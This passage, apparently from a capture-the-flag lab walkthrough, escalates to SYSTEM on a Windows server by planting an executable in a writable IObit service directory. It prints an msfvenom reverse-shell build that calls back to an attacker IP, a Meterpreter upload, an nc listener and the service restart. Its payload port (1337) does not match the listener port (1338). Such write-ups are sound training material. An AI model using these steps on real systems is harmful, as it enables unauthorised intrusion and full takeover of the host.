<p>This means that if were to place an executable file within the path then the new executable would be run instead with the permissions of the service, in our case LocalSystem.</p>
<p>As we can write to the IObit folder, this can be checked using the PowerShell <code>Get-ACL</code> command, we need to:</p>
<ul>
<li>Generate a reverse shell payload</li>
<li>Upload it to this directory</li>
<li>Start a reverse shell listener</li>
<li>Restart the AdvancedSystemCareService9 service</li>
</ul>
<p>We can use msfvenom to generate the executable payload.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">msfvenom -p windows/shell_reverse_tcp LHOST=10.8.7.19 LPORT=1337 -e x86/shikata_ga_nai -f exe -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: Advanced.exe
</code></pre></div><p>Now we can upload it to the server using our Meterpreter session.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">meterpreter &gt; cd &#39;C:\Program Files (x86)\IObit\&#39;
meterpreter &gt; upload Advanced.exe
[*] uploading  : Advanced.exe -&gt; Advanced.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): Advanced.exe -&gt; Advanced.exe
[*] uploaded   : Advanced.exe -&gt; Advanced.exe
meterpreter &gt;
</code></pre></div><p>We can start a new listener on our host to catch the reverse shell</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">nc -vnlp 1338
Listening on [0.0.0.0] (family 0, port 1338)
</code></pre></div><p>To trigger the vulnerability and get our shell we need to restart the service.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">meterpreter &gt; powershell_shell
PS&gt; Restart-Service AdvancedSystemCareService9
PS&gt;
</code></pre></div><p>Going back to our listener we can see that we have received a connection from the host, using <code>whoami</code> we can see that we have a remote shell running with <code>nt authority\system</code> privileges.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">Connection from 10.10.29.151 49400 received!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
whoami
nt authority\system
</code></pre></div><p>Result! We now have full control of the server.</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
